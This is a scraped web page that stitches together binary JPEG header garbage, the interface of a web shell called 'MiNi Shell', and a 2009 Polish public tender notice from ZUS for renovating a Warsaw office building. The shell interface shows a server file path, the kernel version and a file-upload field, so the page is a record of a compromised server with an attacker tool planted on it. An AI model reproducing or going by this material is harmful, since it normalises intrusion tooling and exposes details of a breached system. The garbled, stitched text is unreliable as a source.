JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090715/240082-N-2009.html

<p class="kh_header"><b>Warszawa: Termorenowacja budynku II Oddziału ZUS w Warszawie ul. Podskarbińska 25</b><br>
<b>Numer ogłoszenia: 240082 - 2009; data zamieszczenia: 15.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych II Oddział w Warszawie , ul. Podskarbińska 25, 03-829 Warszawa, woj. mazowieckie, tel. 022 5902322, 5902321, faks 022 5902730, 5902600.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: ubezpieczenia społeczne.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termorenowacja budynku II Oddziału ZUS w Warszawie ul. Podskarbińska 25.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych w budynku 5 kondygnacyjnym typu LIPSK, o kubaturze 27.490 m3, o wysokości - max. 20,40 m nad terenem, wymiary zewnętrzne - 13,70 m x 95,30 m (po dociepleniu). Zakres robót do wykonania:
1) wymiana ścian osłonowych zawierających azbest na ściany nowo zaprojektowane bez azbestu  przy użyciu płyt warstwowych  na nowej stalowej konstrukcji,
2) wymiana stolarki okiennej,
3) docieplenie stropodachu z wymianą klap dymowych, wykonanie centralki p.poż. i instalacji łączącej klapy z główną centralką p.poż.,
4) wymiana instalacji c.o. z grzejnikami i wymiana węzła c.o.,
5) dostawa i montaż platformy hydraulicznej pionowego podnoszenia z poziomu chodnika na wysokość 1,80 m dla osób niepełnosprawnych. Wykonanie zadaszenia i obudowy oraz instalacji elektrycznej, podłączenie i uruchomienie platformy.
6) wykonanie wykończeniowych robót wewnętrznych:
a) wykonanie posadzek w całym obiekcie,
b) wymiana glazury w łazienkach,
c) uzupełnienie instalacji elektrycznej i strukturalnej,
d) wykonanie sali obsługi interesantów w pełnym zakresie (klimatyzacja, instalacja elektryczna, wyposażenie),
e) malowanie ścian.
Roboty powyższe należy wykonać zgodnie z dokumentacją techniczną.

Prace polegające na usuwaniu wyrobów zawierających azbest mogą być wykonywane wyłącznie przez firmę posiadającą decyzję  Prezydenta m.st. Warszawy zezwalającą na  transport  i  usuwanie odpadów zawierających azbest zgodnie z ustawą z dnia 27 kwietnia 2001 r. o odpadach  (Dz.U. 39 poz. 251 z 2007 r. - jednolity tekst), wydaną dla Wykonawcy lub  Podwykonawcy, z terminem ważności obejmującym cały okres realizacji  robót.
Szczegółowy opis przedmiotu zamówienia zostanie zawarty w Specyfikacji Istotnych Warunków Zamówienia do Zaproszenia.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.32.10.00-3, 45.26.14.10-1, 45.33.11.00-7, 45.26.26.60-5, 45.31.31.00-5, 45.31.00.00-3, 45.42.11.30-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> wadium - 30.600,00 zł. Wadium winno być wnoszone  na etapie składania ofert po otrzymaniu przez Wykonawcę zaproszenia do składania ofert<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> § 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:

1) Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają  obowiązek posiadania takich uprawnień.
2)  Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia: 
a) Doświadczenie zawodowe przedstawiające się wykonaniem robót budowlanych  w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia tj.:
1. wykonanie wymiany ścian osłonowych na nowe w budynku o kubaturze min. 10.000 m3 o konstrukcji typu LIPSK lub o podobnej konstrukcji tj. budynku wielokondygnacyjnym o konstrukcji szkieletowej lub budynku wielokondygnacyjnym o układzie nośnym poprzecznym. Zamawiający wymaga wykazaniem się wykonaniem min. jednego zamówienia (przez co rozumie się, że musi wynikać z jednostkowej umowy).
2. wykonanie instalacji c.o. z grzejnikami w budynku biurowym lub innych budynkach o podobnym układzie pomieszczeń, o kubaturze min. 10.000 m3. Zamawiający wymaga wykazaniem się wykonaniem min. jednego zamówienia (przez co rozumie się, że musi wynikać z jednostkowej umowy) 

b)  Wykonawca musi dysponować osobami uprawnionymi do kierowania robotami budowlanymi posiadającymi uprawnienia wymagane na podstawie art.12 ustawy -  Prawo Budowlane, specjalizacja zgodna z określeniem wynikającym z art. 14 w.w. ustawy i zarejestrowanymi w Okręgowej Izbie Inżynierów Budownictwa (min. po jednej osobie danej specjalizacji) lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób posiadających uprawnienia:
1.  do pełnienia samodzielnych funkcji technicznych w specjalności konstrukcyjno - budowlanej  bez ograniczeń uprawniających do kierowania robotami budowlanymi 
2. do pełnienia samodzielnych funkcji technicznych w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych bez ograniczeń uprawniających do kierowania robotami budowlanymi związanymi z obiektem budowlanym, takim jak: sieci i instalacje cieplne, z doborem właściwych urządzeń w projekcie budowlanym oraz ich instalowaniem w procesie budowy lub remontu

3) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
     zamówienia.
     Sytuacja ekonomiczna i finansowa Wykonawcy potwierdzona posiadaniem polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę min. 200.000,00 zł.

4) Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

§ 2. Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez wykonawcę dokumentów i oświadczeń, o których mowa w  niniejszym ogłoszeniu. Zamawiający sprawdzi treść tych dokumentów na zasadzie: spełnia lub nie spełnia oraz oceni spełnianie warunków udziału w postępowaniu. 
Za każdą robotę budowlaną (spełniającą wymogi postawione przez Zamawiającego) przedstawioną w Wykazie robót i potwierdzoną referencjami Wykonawca otrzyma jeden punkt.
     
Zamawiający zaprosi do złożenia oferty maksimum 6 Wykonawców, którzy spełniają warunki udziału w postępowaniu oraz otrzymali w kolejności najwyższą ilość punktów. W przypadku otrzymania takiej samej, najwyższej w kolejności sumy punktów przez więcej niż 6 Wykonawców (np. na 6 miejscu 2 Wykonawców uzyska taką samą sumę punktów) zamawiający zaprosi do składania ofert wszystkich tych Wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> § 1. Wykonawcy biorący udział w postępowaniu muszą złożyć oświadczenie
potwierdzające spełnienie warunków określonych w art.22 ust. 1 pkt. 1-4  ustawy Prawo zamówień publicznych.

§ 2. Wykonawcy biorący udział w postępowaniu  muszą złożyć w celu potwierdzenia  spełnienia  warunków udziału w postępowaniu następujące dokumenty:

1. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych Wykonawca musi złożyć:

a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosku o dopuszczenie do udziału w postępowaniu.

b)  aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca  nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości  wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosku o dopuszczenie do udziału w postępowaniu.

c) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca  nie zalega w opłacaniu składek na ubezpieczenie zdrowotne i społeczne, lub 
zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty 
zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminem składania wniosku o dopuszczenie do udziału w postępowaniu.

d)  aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt.  4 - 8 ustawy Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosku o dopuszczenie do udziału w postępowaniu.

e)  aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt.  9 ustawy Prawo zamówień publicznych wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosku o dopuszczenie do udziału w postępowaniu.

2.  W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami  zdolnymi do wykonywania zamówienia lub pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, Wykonawca musi złożyć:

a) wykaz - wykonanych  robót w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robót stanowiącym przedmiot zamówienia tj.:
1) wykonanie wymiany ścian osłonowych na nowe w budynku o kubaturze min. 10.000 m3 o konstrukcji typu LIPSK lub o podobnej konstrukcji tj. budynku wielokondygnacyjnym o konstrukcji szkieletowej lub budynku wielokondygnacyjnym o układzie nośnym poprzecznym. Zamawiający wymaga wykazaniem się wykonaniem min. jednego zamówienia (przez co rozumie się, że musi wynikać z jednostkowej umowy).
2) wykonanie instalacji c.o. z grzejnikami w budynku biurowym lub innych budynkach o podobnym układzie pomieszczeń, o kubaturze min. 10.000 m3. Zamawiający wymaga wykazaniem się wykonaniem min. jednego zamówienia (przez co rozumie się, że musi wynikać z jednostkowej umowy).
Do wykazu Wykonawca musi dołączyć dokumenty potwierdzające, że roboty zostały wykonane należycie. Dokumenty muszą być wystawione przez zamawiającego/odbiorcę robót. 
b)   wykaz osób pełniających funkcje kierownika robót zg. z warunkiem udziału w postępowaniu określonym w § 1 ust. 2 pkt. b. W przypadku gdy osoby, które będą wykonywać zamówienie udostępni inny podmiot należy dodatkowo przedstawić pisemne zobowiązanie powyższego podmiotu do udostępnienia osób wskazanych w wykazie. Do wykazu należy dołączyć kopię uprawnień i aktualny dokument rejestracji w Okręgowej Izbie Inżynierów Budownictwa.
3. W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Wykonawca musi złożyć polise, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę min. 200.000,00 zł.

§ 3. 1 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w § 2 ust. 1 : 

1) lit. a, b, c, e - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. 
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.

2) lit.d - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy Prawo zamówień publicznych.

2. Dokumenty, o których mowa w ust. 1 pkt. 1 lit. a  i  c  oraz  ust. 2,  powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosku o dopuszczenie do udziału w postępowaniu.
Dokument, o którym mowa dokument w ust. 1. pkt. 1 lit.  b, powinien być wystawiony nie wcześniej  niż 3 miesiące przed upływem terminu składania wniosku o dopuszczenie do udziału w postępowaniu.


3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Zapis ust. 2 stosuje się odpowiednio.

§ 4 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika  do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.

W tym przypadku Wykonawcy występujący wspólnie muszą  złożyć:
- pełnomocnictwo do reprezentacji podmiotów występujących wspólnie,  
- każdy z uczestników wchodzący w skład podmiotu wspólnie ubiegającego się o udzielenie zamówienia musi załączyć dokumenty wymienione w  § 1 i § 2 ust. 1. Pozostałe dokumenty składają wszyscy Wykonawcy wspólnie.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, o którym mowa w § 1: w zakresie spełniania wymagań określonych w art.22 ust. 1 pkt. 1 i 4 - składa każdy odrębnie, natomiast w zakresie określonym w art. 22 ust.1 pkt. 2 i 3 - wszyscy łącznie. 

Wszystkie dokumenty Wykonawców mogących wspólnie ubiegać się o udzielenie zamówienia muszą wchodzić w skład danego wniosku i być złożone łącznie.
Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zostanie wybrana, taki Wykonawca będzie zobowiązany przed zawarciem umowy w sprawie zamówienia publicznego do złożenia Zamawiającemu umowy regulującej współpracę tych wykonawców. 

§ 5. Wniosek o dopuszczenie do udziału w postępowaniu.

Wzór formularza wniosku o dopuszczenie do udziału w postępowaniu, oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 pkt. 1-4 ustawy, wykaz robót, wykaz osób pełniających funkcje kierownika robót   dostępny jest w siedzibie Zamawiającego lub można otrzymać faksem albo drogą elektroniczną pod adresem konopkoa@zus.pl.

Wniosek, dokumenty, wykazy i oświadczenia muszą być sporządzone w formie pisemnej, w języku polskim. W przypadku załączenia dokumentu w języku obcym należy dołączyć  tłumaczenie na język polski  poświadczone przez Wykonawcę.  

Złożone przez Wykonawcę wraz z wnioskiem dokumenty, wykazy  i oświadczenia muszą być podpisane i opatrzone imienną pieczątką przez osoby upoważnione do reprezentowania Wykonawcy, wymienione we właściwym rejestrze lub wpisie do ewidencji działalności gospodarczej  lub przez pełnomocnika wyznaczonego przez osobę upoważnioną. W takiej sytuacji pełnomocnictwo musi być dołączone do wniosku..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 6.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZUS  II  Oddział  w  Warszawie,
Wieloosobowe Stanowisko ds. Zamówień Publicznych,
ul. Podskarbińska 25, pok.321,
03-829 Warszawa.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2009 godzina 10:00, miejsce: ZUS  II  Oddział  w  Warszawie
Wieloosobowe Stanowisko ds. Zamówień Publicznych
ul. Podskarbińska 25, pok.321,
03-829 Warszawa.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com